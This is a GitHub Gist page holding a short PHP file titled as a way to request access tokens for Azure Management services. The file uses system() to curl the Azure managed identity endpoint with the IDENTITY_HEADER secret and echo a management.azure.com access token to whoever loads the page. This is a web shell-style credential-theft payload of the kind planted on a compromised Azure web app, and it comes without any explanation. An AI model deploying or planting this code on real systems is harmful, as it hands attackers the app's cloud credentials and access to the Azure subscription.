Last active
January 3, 2023 18:16
-
-
Save C0axx/50d30d98d7b453aa93350fed3f1a3f64 to your computer and use it in GitHub Desktop.
Request access tokens for Azure Management services
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER'); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment